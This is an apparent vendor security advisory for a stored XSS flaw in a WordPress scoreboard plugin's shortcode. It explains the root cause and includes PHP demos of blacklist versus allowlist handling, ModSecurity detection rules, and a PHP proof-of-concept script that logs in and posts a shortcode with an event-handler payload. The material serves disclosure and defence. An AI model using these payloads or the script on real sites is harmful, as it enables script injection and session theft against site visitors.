Atomic Edge analysis of CVE-2026-4083 (metadata-based):
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Scoreboard for HTML5 Games Lite WordPress plugin, affecting versions up to and including 1.2. The vulnerability exists in the plugin’s ‘scoreboard’ shortcode handler, which insufficiently validates HTML attributes before rendering them within an iframe element. Attackers with Contributor-level access or higher can inject malicious scripts that execute when a user views a compromised page.
Atomic Edge research identifies the root cause as improper input neutralization within the sfhg_shortcode() function. The function accepts arbitrary HTML attributes for the rendered iframe, applying only a minimal blacklist of four specific attribute names (same_height_as, onload, onpageshow, onclick). Although attribute names pass through esc_html() and values through esc_attr(), those functions only escape characters; they do not stop a well-formed attribute name such as onfocus or onmouseover from being emitted as a JavaScript event handler. The shortcode text persists in post_content as plain text, and WordPress’s kses filtering runs on that stored text before shortcode expansion at render time, so it never sees the iframe markup the shortcode generates. These conclusions are inferred from the CWE classification and vulnerability description, as source code confirmation is unavailable.
Exploitation requires Contributor-level authentication to create or edit posts containing the malicious shortcode. Attackers embed the [scoreboard] shortcode with crafted event handler attributes containing JavaScript payloads. For example: [scoreboard onmouseover="alert(document.cookie)" src="https://example.com/game.html"]. When any user views the post, the plugin renders an iframe with the injected attribute, executing the payload upon the specified event trigger. The attack vector operates entirely through the WordPress post editor interface.
Proper remediation requires implementing an allowlist approach for iframe attributes instead of the ineffective blacklist. The patched version (1.3) likely validates attribute names against a predefined set of safe attributes (src, width, height, etc.) before rendering. Additionally, the plugin should sanitize attribute values more rigorously, potentially using wp_kses() with custom allowed HTML rules for iframe elements. These measures would prevent injection of unauthorized event handlers while maintaining legitimate shortcode functionality.
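The following is an added example written for this page, not the plugin's code (which is not available for confirmation). It reproduces the attribute-handling pattern described in the root-cause paragraph above (a blacklist of four names, names through esc_html(), values through esc_attr()) beside the allowlist approach the remediation paragraph recommends, and runs both on the advisory's sample shortcode. The parser, the two render functions and the allowed-attribute set are assumptions for illustration; the WordPress escaping helpers are replaced by minimal stand-ins so the file runs outside WordPress.

```php
<?php
// Added example, not the plugin's code. Stand-ins for the WordPress escaping
// helpers so this file runs outside WordPress; the real functions are used
// when present.
if (!function_exists('esc_attr')) {
    // Stand-in for WordPress esc_attr(): HTML-escape an attribute value.
    function esc_attr(string $value): string {
        return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('esc_html')) {
    // Stand-in for WordPress esc_html(): HTML-escape text content.
    function esc_html(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}

// Minimal attribute parser for a [scoreboard ...] tag with double-quoted
// values (hypothetical helper). Like WordPress's shortcode_parse_atts(), it
// lowercases attribute names, so ONMOUSEOVER and onmouseover are the same key.
function parse_scoreboard_atts(string $shortcode): array {
    if (!preg_match('/^\[scoreboard\b([^\]]*)\]$/', trim($shortcode), $m)) {
        return [];
    }
    preg_match_all('/([\w-]+)\s*=\s*"([^"]*)"/', $m[1], $pairs, PREG_SET_ORDER);
    $atts = [];
    foreach ($pairs as $p) {
        $atts[strtolower($p[1])] = $p[2];
    }
    return $atts;
}

// Vulnerable pattern as the advisory describes it: every attribute is copied
// onto the iframe unless its name is on a short blacklist. Escaping the name
// and value does not help, because a well-formed name such as onmouseover is
// the injection itself.
function render_iframe_blacklist(array $atts): string {
    $blocked = ['same_height_as', 'onload', 'onpageshow', 'onclick'];
    $html = '<iframe';
    foreach ($atts as $name => $value) {
        if (in_array($name, $blocked, true)) {
            continue;
        }
        $html .= ' ' . esc_html($name) . '="' . esc_attr($value) . '"';
    }
    return $html . '></iframe>';
}

// Hardened pattern: only a fixed set of iframe attributes (assumed here) is
// emitted, so any on* handler is dropped whatever its name or casing, and
// src must be an http(s) URL. Inside WordPress the same effect can be had by
// passing the finished markup through wp_kses() with an 'iframe' entry in
// $allowed_html that lists exactly these attributes.
function render_iframe_allowlist(array $atts): string {
    $allowed = ['src', 'width', 'height', 'title', 'loading', 'allowfullscreen'];
    $html = '<iframe';
    foreach ($atts as $name => $value) {
        if (!in_array($name, $allowed, true)) {
            continue;
        }
        if ($name === 'src') {
            $scheme = strtolower((string) parse_url($value, PHP_URL_SCHEME));
            if (!in_array($scheme, ['http', 'https'], true)) {
                continue;
            }
        }
        $html .= ' ' . $name . '="' . esc_attr($value) . '"';
    }
    return $html . '></iframe>';
}

// The advisory's sample shortcode, run through both renderers.
$sample = '[scoreboard onmouseover="alert(document.cookie)" src="https://example.com/game.html"]';
$atts = parse_scoreboard_atts($sample);

echo "blacklist: " . render_iframe_blacklist($atts) . "\n";
echo "allowlist: " . render_iframe_allowlist($atts) . "\n";
```

Run with `php example.php`: the blacklist renderer emits the onmouseover attribute unchanged, because neither esc_html() nor esc_attr() has anything to escape in it, while the allowlist renderer emits only the src attribute. The allowlist is also what makes the fix robust against the WAF-evasion variants (mixed case, attribute names outside any fixed list) that a blacklist cannot enumerate.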
Successful exploitation allows authenticated attackers with at least Contributor privileges to execute arbitrary JavaScript in the context of any user viewing the compromised page. This enables session hijacking, administrative actions through CSRF, defacement via DOM manipulation, and data exfiltration from authenticated users. The stored nature means payloads execute repeatedly without further attacker interaction, amplifying potential damage. The CVSS score of 6.4 reflects medium severity with scope change (S:C) due to impact beyond the vulnerable component.
Here you will find our ModSecurity-compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-4083 (metadata-based)
# This rule blocks exploitation attempts via WordPress post editor submissions containing malicious scoreboard shortcode attributes.
# The rule targets POST requests to wp-admin/post.php with specific shortcode patterns containing JavaScript event handlers.
# Note: both rules inspect the classic-editor form field "content"; posts saved through the block editor's REST endpoint (/wp-json/wp/v2/posts, JSON body) are not covered and need a separate rule on REQUEST_BODY.
# t:lowercase is applied because WordPress lowercases shortcode attribute names, so ONMOUSEOVER reaches the plugin as onmouseover.
SecRule REQUEST_URI "@endsWith /wp-admin/post.php" \
"id:20264083,phase:2,deny,status:403,chain,msg:'CVE-2026-4083: Scoreboard for HTML5 Games Lite Stored XSS via Shortcode',severity:'CRITICAL',tag:'CVE-2026-4083',tag:'WordPress',tag:'Plugin/scoreboard-for-html5-game-lite',tag:'attack-xss'"
SecRule REQUEST_METHOD "@streq POST" "chain"
SecRule ARGS_POST:content "@rx \[scoreboard[^\]]*on(click|dblclick|focus|blur|change|select|submit|keydown|keypress|keyup|mousedown|mousemove|mouseout|mouseover|mouseup|load|unload|error|resize|scroll)\s*=" \
"t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,capture,setvar:'tx.cve_2026_4083_score=+1'"
# Secondary rule: catch any on* attribute name followed by "=" (\x3d), including handlers missing from the list above (e.g. onmouseenter) and encoded forms that the transformations decode.
SecRule REQUEST_URI "@endsWith /wp-admin/post.php" \
"id:20264084,phase:2,deny,status:403,chain,msg:'CVE-2026-4083: Scoreboard for HTML5 Games Lite Stored XSS via Encoded Shortcode Attributes',severity:'CRITICAL',tag:'CVE-2026-4083',tag:'WordPress',tag:'Plugin/scoreboard-for-html5-game-lite',tag:'attack-xss'"
SecRule REQUEST_METHOD "@streq POST" "chain"
SecRule ARGS_POST:content "@rx \[scoreboard[^\]]*\bon\w+\s*\x3d" \
"t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
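Before deploying a rule like the one above it is worth checking what its patterns actually match. The script below is an added example written for this page, not Atomic Edge's tooling: it applies the first rule's regex verbatim and a catch-all "any on* attribute followed by =" pattern (assumed here as the form of the secondary check; compare it with the rule you deploy) to constructed post-body values, after the same decoding the rule's transformation chain performs (urlDecodeUni as urldecode(), htmlEntityDecode as html_entity_decode()), with and without a lowercase step. The sample submissions are constructed for the demonstration.

```php
<?php
// Added example, not Atomic Edge's code. Exercises the WAF rule patterns
// against constructed ARGS_POST:content values.

// Pattern of the first rule: listed event-handler names followed by "=".
const RULE_LISTED = '/\[scoreboard[^\]]*on(click|dblclick|focus|blur|change|select|submit|keydown|keypress|keyup|mousedown|mousemove|mouseout|mouseover|mouseup|load|unload|error|resize|scroll)\s*=/';
// Catch-all: any on* attribute name followed by "=" (assumed form of the
// secondary rule's check).
const RULE_ANY = '/\[scoreboard[^\]]*\bon\w+\s*\x3d/';

// Mirror the rule's transformation chain on one form field value. The body
// has already been URL-decoded once when the WAF parsed it, so urldecode()
// here corresponds to t:urlDecodeUni catching a second encoding layer.
function normalize(string $content, bool $lowercase): string {
    $s = urldecode($content);
    $s = html_entity_decode($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return $lowercase ? strtolower($s) : $s;
}

// Report which of the two patterns fires on the given content.
function check_content(string $content, bool $lowercase = false): array {
    $s = normalize($content, $lowercase);
    return [
        'listed' => (bool) preg_match(RULE_LISTED, $s),
        'any'    => (bool) preg_match(RULE_ANY, $s),
    ];
}

// Constructed sample submissions (the first two reuse the payloads shown on
// this page; the rest are encoding and casing variants of the same thing).
$samples = [
    'advisory payload (onmouseover)' => '[scoreboard onmouseover="alert(document.cookie)" src="https://example.com/game.html"]',
    'PoC payload (onmouseenter)'     => '[scoreboard src="https://example.com/game.html" onmouseenter="alert(1)"]',
    'double URL-encoded'             => '%5Bscoreboard%20onfocus%3D%22alert(1)%22%5D',
    'entity-encoded "="'             => '[scoreboard onblur&#61;"alert(1)"]',
    'upper-case name'                => '[scoreboard ONMOUSEOVER="alert(1)"]',
    'benign'                         => '[scoreboard src="https://example.com/game.html" width="600" height="400"]',
];

foreach ([false, true] as $lowercase) {
    echo $lowercase ? "with lowercase:\n" : "without lowercase:\n";
    foreach ($samples as $label => $content) {
        $r = check_content($content, $lowercase);
        printf("  %-32s listed=%s any=%s\n", $label,
            $r['listed'] ? 'yes' : 'no', $r['any'] ? 'yes' : 'no');
    }
}
```

Two observations fall out of the run. The listed-names pattern misses the onmouseenter handler used in the proof of concept further down this page, because that name is not in its alternation, while the catch-all pattern flags it; and without a lowercase step neither pattern matches ONMOUSEOVER, even though WordPress lowercases shortcode attribute names before the plugin sees them, which is why a t:lowercase transformation belongs in the chain. The catch-all pattern is the broader net and will also flag any benign attribute whose name happens to start with "on", so expect to tune it against your own content.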
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4083 - Scoreboard for HTML5 Games Lite <= 1.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes
<?php
$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'contributor_user';
$password = 'contributor_password';

// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ])
]);
$response = curl_exec($ch);

// Step 2: Create a new post with malicious shortcode
// Assumption: Contributor users can create posts via wp-admin/post-new.php
$new_post_url = $target_url . '/wp-admin/post-new.php';
curl_setopt_array($ch, [
    CURLOPT_URL => $new_post_url,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_REFERER => $login_url
]);
$response = curl_exec($ch);

// Extract nonce from post creation page (simplified - actual implementation would parse HTML)
// For demonstration, we assume a valid nonce is obtained
$nonce = 'extracted_nonce_here';

// Step 3: Submit post with XSS payload in shortcode
// Payload uses onmouseenter event handler to trigger when user hovers over iframe
$save_post_url = $target_url . '/wp-admin/post.php';
$post_content = '[scoreboard src="https://example.com/game.html" width="600" height="400" onmouseenter="alert(\'XSS via CVE-2026-4083\');" data-custom="allowed_attribute"]';
curl_setopt_array($ch, [
    CURLOPT_URL => $save_post_url,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'post_title' => 'Game Scoreboard',
        'content' => $post_content,
        'publish' => 'Publish',
        'post_type' => 'post',
        '_wpnonce' => $nonce,
        'post_status' => 'publish'
    ])
]);
$response = curl_exec($ch);

// Step 4: Verify payload persists by checking post content
if (strpos($response, 'onmouseenter') !== false) {
    echo "[+] XSS payload successfully injected via shortcode.\n";
    echo "[+] Visit the published post to trigger the onmouseenter event.\n";
} else {
    echo "[-] Payload injection may have failed.\n";
}

curl_close($ch);
unlink('cookies.txt');
?>